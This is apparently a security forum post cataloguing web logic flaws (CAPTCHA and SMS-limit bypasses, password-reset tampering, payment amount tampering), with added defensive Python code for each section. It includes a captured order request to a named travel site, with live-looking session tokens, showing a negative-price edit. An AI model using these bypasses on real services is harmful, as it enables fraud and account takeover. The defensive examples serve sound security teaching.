This post was last edited by tom0li on 2017-8-14 22:30
Logic vulnerability notes
0x00 Common locations
Personal information
Password change
Forgotten password
Payment area
Phone number
Address
0x01 Login (not limited to login; see e.g. the SMS bombing below)
At login, can the CAPTCHA be bypassed to allow credential stuffing?
The CAPTCHA value is in the response body
The CAPTCHA value is in a hidden field on the returned page
Some other login URLs do not require a CAPTCHA
The CAPTCHA does not change: it has no dedicated service request of its own and only changes when the URL is refreshed
The first request checks whether the CAPTCHA is correct; the second request is not verified
Intercept the CAPTCHA refresh request at login; the first CAPTCHA has not been invalidated and can be bypassed
Are the CAPTCHA, username and password submitted together in a single request?
Official accounts and apps with no CAPTCHA verification
OCR recognition of simple CAPTCHAs
Hand off to a third-party CAPTCHA-solving service
Email bombing, SMS bombing, Burp Repeater; when SMS bombing hits the 60-second limit on verification codes, modifying certain parameters can bypass it
isVerfi parameter: here it is 1, the response is 3, the phone receives no message, a verification-code limit is in place
Change it to 0, the response is 2, the verification-code limit is bypassed
Enumerating registered users: enter a username and send the request to check whether the username is valid
Cookie is simple and guessable
Cookie stays valid indefinitely (even after the password is changed)
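Most of the login items above come down to three server-side properties: the code is never sent back to the client, it is consumed in the same request that carries the username and password, and the SMS send limit is decided by the server's own counters rather than a client flag. The following is an added example (not code from the original post or from any site it mentions) of a verification-code store and an SMS throttle with those properties; the policy constants, the session ids and the `users` dictionary (a stand-in for a hashed-password lookup) are assumptions made for the example.

```python
import hmac
import secrets
import time

# Policy constants (constructed for this example; tune to the deployment)
CODE_TTL_SECONDS = 300          # a code is valid for at most five minutes
MAX_CODE_ATTEMPTS = 5           # wrong guesses before the code is discarded
SMS_MIN_INTERVAL_SECONDS = 60   # one SMS per phone number per minute
SMS_MAX_PER_DAY = 10            # hard daily ceiling per phone number


class VerificationCodeStore:
    """Server-side store of one-time codes keyed by session id.

    The code reaches the user only over the SMS/e-mail channel; it is never
    echoed in a response body or a hidden form field.
    """

    def __init__(self, clock=time.time):
        self._clock = clock
        self._codes = {}  # session_id -> [code, issued_at, wrong_attempts]

    def issue(self, session_id):
        # Issuing a new code replaces the old one, so a stale code cannot be
        # kept alive by holding back the refresh request.
        code = f"{secrets.randbelow(10**6):06d}"
        self._codes[session_id] = [code, self._clock(), 0]
        return code  # handed to the SMS/e-mail sender, not to the HTTP response

    def consume(self, session_id, submitted):
        """Check and destroy the code in one step, so a replayed code fails."""
        entry = self._codes.get(session_id)
        if entry is None:
            return False
        code, issued_at, attempts = entry
        if self._clock() - issued_at > CODE_TTL_SECONDS:
            del self._codes[session_id]
            return False
        if not hmac.compare_digest(code, str(submitted)):
            entry[2] = attempts + 1
            if entry[2] >= MAX_CODE_ATTEMPTS:
                del self._codes[session_id]  # brute-force budget exhausted
            return False
        del self._codes[session_id]  # single use
        return True


class SmsThrottle:
    """Send limits enforced from the server's own clock and counters, so no
    client-supplied flag can switch them off."""

    def __init__(self, clock=time.time):
        self._clock = clock
        self._sent = {}  # phone -> timestamps of sends in the last 24 h

    def allow(self, phone):
        now = self._clock()
        history = [t for t in self._sent.get(phone, []) if now - t < 86400]
        self._sent[phone] = history
        if len(history) >= SMS_MAX_PER_DAY:
            return False
        if history and now - history[-1] < SMS_MIN_INTERVAL_SECONDS:
            return False
        history.append(now)
        return True


def login(session_id, username, password, code, codes, users):
    """Username, password and code are checked in one request; a passed
    check in an earlier request carries nothing over to this one."""
    if not codes.consume(session_id, code):
        return "code_failed"
    stored = users.get(username)  # stand-in for a hashed-password lookup
    if stored is None or not hmac.compare_digest(stored, password):
        return "bad_credentials"  # one message for unknown user and wrong password
    return "ok"
```

The single `bad_credentials` result for both an unknown username and a wrong password is what closes the user-enumeration item; the throttle keyed on the phone number (not on a request parameter) is what closes the isVerfi-style bypass.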
0x02 Password recovery
Verification code is returned to the client
Verification code is long-lived and never expires, so it can be brute-forced (the dictionary can drop codes such as all 1s and codes with many repeated digits)
Change the password: change the phone number the code is sent to, to one you control
Email verification is guessable
Suppose recovery takes 4 steps and the last step carries a user parameter: go through step 3 normally with your own account, then change user in step 4
Two phone numbers
First phone
Normal forgot-password flow up to step 3
In the same browser
Second phone number
Forgot password, submit up to step 2
Refresh the first phone's step 3: the username is found to have changed to the second phone
Same for email
Delete the verification-code check to bypass it
Fuzz all kinds of parameters
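The recovery items above share one root cause: the identity being reset is carried in the client's requests (a user field, a phone field, or per-browser state shared between two flows) instead of in a server-side record created at step 1. Added example, not code from the original post: a reset flow in which every later step is addressed by an opaque token, the code goes only to the phone on record, wrong codes are counted, the whole flow expires, and completing the reset revokes the account's existing sessions (the "cookie still valid after password change" item from the login section). The `accounts`, `sessions` and `send_sms` shapes and the two constants are assumptions for the example.

```python
import hmac
import secrets
import time

RESET_TTL_SECONDS = 600        # the whole flow must finish within ten minutes
MAX_RESET_CODE_ATTEMPTS = 5    # wrong codes before the flow is discarded


class PasswordResetFlow:
    """Multi-step reset whose state lives on the server.

    Step 1 identifies the account and creates a flow record addressed by an
    opaque token. Steps 2 and 3 take only that token: the account being reset
    is read from the record, never from a request field, so a 'user' parameter
    in the last step has nothing to overwrite, and two flows started in the
    same browser each keep their own identity.
    """

    def __init__(self, accounts, sessions, send_sms, clock=time.time):
        self._accounts = accounts   # username -> {"phone": ..., "password": ...}
        self._sessions = sessions   # session cookie -> username
        self._send_sms = send_sms   # callable(phone, code)
        self._clock = clock
        self._flows = {}            # token -> flow record

    def step1_start(self, username):
        token = secrets.token_urlsafe(32)
        account = self._accounts.get(username)
        if account is not None:
            code = f"{secrets.randbelow(10**6):06d}"
            self._flows[token] = {"user": username, "code": code, "verified": False,
                                  "attempts": 0, "issued": self._clock()}
            # Delivered to the phone on record; the client cannot choose it.
            self._send_sms(account["phone"], code)
        # Unknown usernames get an indistinguishable token back (no enumeration).
        return token

    def _live_flow(self, token):
        flow = self._flows.get(token)
        if flow is None:
            return None
        if self._clock() - flow["issued"] > RESET_TTL_SECONDS:
            del self._flows[token]
            return None
        return flow

    def step2_verify_code(self, token, code):
        flow = self._live_flow(token)
        if flow is None:
            return False
        if not hmac.compare_digest(flow["code"], str(code)):
            flow["attempts"] += 1
            if flow["attempts"] >= MAX_RESET_CODE_ATTEMPTS:
                del self._flows[token]  # the code cannot be brute-forced
            return False
        flow["verified"] = True
        return True

    def step3_set_password(self, token, new_password, **client_fields):
        # client_fields (e.g. a tampered user=...) is accepted and ignored on purpose.
        flow = self._live_flow(token)
        if flow is None or not flow["verified"]:
            return False
        del self._flows[token]  # the token is single use
        user = flow["user"]
        self._accounts[user]["password"] = new_password
        # Revoke every existing session of this account so an old cookie
        # does not stay valid after the password change.
        for cookie in [c for c, u in self._sessions.items() if u == user]:
            del self._sessions[cookie]
        return True
```

Note that step 3 never looks at `client_fields`: the only way to change the account a token resets is to start a new flow, which sends a new code to that account's own phone.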
0x03 Payment
Modifying the amount or shipping fee
```
POST /iflight/submitorder.html HTTP/1.1
Host: wx.17u.cn
Accept: application/json
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Origin: http://wx.17u.cn
Content-Length: 780
Connetion: keep-alive
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B436 MicroMessenger/6.3.13 NetType/3G+ Language/zh_CN
Referer: http://wx.17u.cn/iflight/book2.html?showwxpaytitle=1&guid=0e1d1663-803f-4f0d-962c-6efdd953bfb0&pname=%E4%BC%98%E9%80%89%E7%BB%8F%E6%B5%8E%E8%88%B1&openId=oOCyauK2742VyO4lLB7MR9KyZ21o
Cookie: Hm_lpvt_ce483b7c47bdfff963bf969de6b20019=1455694949; Hm_lpvt_f124dc8d3ca8e5fe66210d2c8c4c9c73=1455694949; Hm_lvt_ce483b7c47bdfff963bf969de6b20019=1455693089; Hm_lvt_dac6eb9775cdf535d3f23bd7df437024=1455530510; Hm_lvt_f124dc8d3ca8e5fe66210d2c8c4c9c73=1455693079; ASP.NET_SessionId=ynx5tnjn35tycx4ed1njfv51; RedEnvelope=mobile=*&proid=1&sign=e657fb8e47cb54685a9dc8ba1c2ef71a; route=04c7e27d7ac260044207170d0d0c2dcc; __tctma=217272534.1455530050464768.1455530050361.1455530050361.1455692231159.2; __tctmb=217272534.2336832102596608.1455694516121.1455694520499.39; __tctmc=217272534.255680334; __tctmd=217272534.49516128; __tctmu=217272534.0.0; __tctmz=217272534.1455692231159.2.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __tctrack=0; cookieOpenSource=openid=oOCyauK2742VyO4lLB7MR9KyZ21o&token=OezXcEiiBSKSxW0eoylIeGWrGa1k0ZhUFKJ2Kjd4-zx3QnTOZ8dZFNps3K1OWCRUlPHVgWxoAKNpZkdnWqlPK4-rFsO78vhV_f3g5ssJfbvO-sxvyvNd1ejJdQzrafo37eJPpoRbmC4oEv-F13n28g; CooperateUser=CooperateUserId=oOCyauK2742VyO4lLB7MR9KyZ21o&openid=oOCyauK2742VyO4lLB7MR9KyZ21o&MemberId=KJ1N9y9uWzKeAIYNlnf7IQ%3d%3d; CooperateWxUser=CooperateUserId=oOCyauK2742VyO4lLB7MR9KyZ21o&openid=oOCyauK2742VyO4lLB7MR9KyZ21o&MemberId=KJ1N9y9uWzKeAIYNlnf7IQ%3d%3d&token=OezXcEiiBSKSxW0eoylIeGWrGa1k0ZhUFKJ2Kjd4-zx3QnTOZ8dZFNps3K1OWCRU457vrjrGm572APrLXimER80jQ-aUtGsJG2gofngMvkfOIsX5HHbL8R8vXcvyBn3l6c2rjQeO9pAbvQqg3UYPVA&MemberSysId=33; longKey=1455530050464768; selectIFlightTip=true; WxUser=openid=oOCyauK2742VyO4lLB7MR9KyZ21o&token=OezXcEiiBSKSxW0eoylIeGWrGa1k0ZhUFKJ2Kjd4-zx3QnTOZ8dZFNps3K1OWCRU457vrjrGm572APrLXimER80jQ-aUtGsJG2gofngMvkfOIsX5HHbL8R8vXcvyBn3l6c2rjQeO9pAbvQqg3UYPVA&refreshtoken=OezXcEiiBSKSxW0eoylIeGWrGa1k0ZhUFKJ2Kjd4-zx3QnTOZ8dZFNps3K1OWCRUPl81zJaYBlhJ559aXBeMJxcXQjdSymG3BlcYQapjwxGizgjMMomJlQRrag5UzFSLvQeUmKHWQMxUUkKgTLhGww&userid=KJ1N9y9uWzKeAIYNlnf7IQ==

req=%7B%22sg%22%3A%220e1d1663-803f-4f0d-962c-6efdd953bfb0%22%2C%22opass%22%3A%5B%7B%22ln%22%3A%22CE%22%2C%22fn%22%3A%22SHI%22%2C%22sex%22%3A1%2C%22nat%22%3A%22%E4%B8%AD%E5%9B%BD%22%2C%22bir%22%3A%221989-01-01%22%2C%22ctype%22%3A%221%22%2C%22no%22%3A%2215262727%22%2C%22pt%22%3A%221%22%2C%22lid%22%3A%2297789585%22%2C%22bx%22%3A%5B%7B%22bxtype%22%3A391%2C%22bxprice%22%3A80%2C%22bxcutprofit%22%3A0%2C%22reentryAmount%22%3A65%2C%22bxqz%22%3Afalse%7D%2C%7B%22bxtype%22%3A331%2C%22bxprice%22%3A20%7D%5D%7D%5D%2C%22contact%22%3A%7B%22mo%22%3A%2213111111111%22%2C%22email%22%3A%22%22%7D%2C%22mtype%22%3A0%2C%22account%22%3A%22%22%2C%22memid%22%3A139978118%2C%22Plat%22%3A10%2C%22pubplat%22%3A501%2C%22inf%22%3A0%2C%22cnn%22%3A0%2C%22adt%22%3A1%2C%22total%22%3A1462%7D&moblie=13111111111
```
Modify bxprice: it can be changed to any negative amount, because the server charges the client-supplied price instead of recomputing it.
Example: https://threathunter.org/topic/593ff6bc9c58e020408a79d4
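The request above carries bxprice and total inside the URL-encoded `req` JSON, and the flaw is that the server trusts them. Added example, not code from the original post or from the site in the capture: a pricing routine that parses a form body of that shape and recomputes every monetary field from server-side data, rejecting any order whose claimed insurance price or total disagrees with the catalog (which covers the negative-amount case). The fare table keyed by the `sg` guid, the insurance catalog keyed by `bxtype`, and the exact fare value are assumptions constructed so that the sample order totals 1462, like the capture.

```python
import json
from urllib.parse import parse_qs, quote

# Server-side price sources. Constructed for this example: a real shop reads
# the fare from the quote identified by the order's "sg" guid and the
# insurance prices from its own catalog, keyed by bxtype.
FARE_BY_SEARCH_GUID = {"0e1d1663-803f-4f0d-962c-6efdd953bfb0": 1362}
INSURANCE_PRICE_BY_TYPE = {391: 80, 331: 20}


class OrderRejected(Exception):
    """Raised when the client's order cannot be priced from server-side data."""


def price_order(form_body):
    """Parse a submitorder form body and recompute every monetary field.

    bxprice and total arrive from the client, so they are treated as claims
    to check against the catalog, never as inputs to the charge.
    """
    fields = parse_qs(form_body, strict_parsing=True)
    try:
        req = json.loads(fields["req"][0])
    except (KeyError, ValueError) as exc:
        raise OrderRejected(f"malformed req field: {exc}")
    if not isinstance(req, dict):
        raise OrderRejected("req is not a JSON object")

    fare = FARE_BY_SEARCH_GUID.get(req.get("sg"))
    if fare is None:
        raise OrderRejected("unknown or expired search guid")

    passengers = req.get("opass") or []
    if not passengers:
        raise OrderRejected("order has no passengers")

    total = 0
    for passenger in passengers:
        total += fare
        for item in passenger.get("bx", []):
            catalog_price = INSURANCE_PRICE_BY_TYPE.get(item.get("bxtype"))
            if catalog_price is None:
                raise OrderRejected(f"unknown insurance type {item.get('bxtype')!r}")
            claimed = item.get("bxprice")
            # Strict equality with the catalog covers the page's negative-amount
            # edit as well as any other rewrite of the price.
            if isinstance(claimed, bool) or not isinstance(claimed, int) or claimed != catalog_price:
                raise OrderRejected(f"bxprice {claimed!r} does not match catalog price {catalog_price}")
            total += catalog_price

    if req.get("total") != total:
        raise OrderRejected(f"client total {req.get('total')!r} != server total {total}")
    return total


# A constructed order in the shape of the capture above (same sg guid, same
# insurance types and prices, same total), with the passenger record reduced
# to the fields needed here.
SAMPLE_ORDER = {
    "sg": "0e1d1663-803f-4f0d-962c-6efdd953bfb0",
    "opass": [{"ln": "CE", "fn": "SHI",
               "bx": [{"bxtype": 391, "bxprice": 80}, {"bxtype": 331, "bxprice": 20}]}],
    "total": 1462,
}


def build_body(order):
    """Encode an order the way the capture does ("moblie" is the capture's own field name)."""
    return "req=" + quote(json.dumps(order, separators=(",", ":"))) + "&moblie=13111111111"


def demo_results():
    """Price a legitimate order and two tampered variants of it."""
    results = {"legit": price_order(build_body(SAMPLE_ORDER))}
    tampered = json.loads(json.dumps(SAMPLE_ORDER))  # deep copy
    tampered["opass"][0]["bx"][0]["bxprice"] = -1000  # the page's negative-amount edit
    tampered["total"] = 1362 - 1000 + 20
    for name, order in (("negative_bxprice", tampered),
                        ("total_only", {**SAMPLE_ORDER, "total": 1})):
        try:
            price_order(build_body(order))
            results[name] = "accepted"
        except OrderRejected as exc:
            results[name] = f"rejected: {exc}"
    return results
```

Returning the server-computed total (rather than echoing the client's) is what the payment step should be charged against; the rejections are also worth logging, since a client whose submitted prices disagree with the catalog is a useful detection signal.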
0x04 Authorization bypass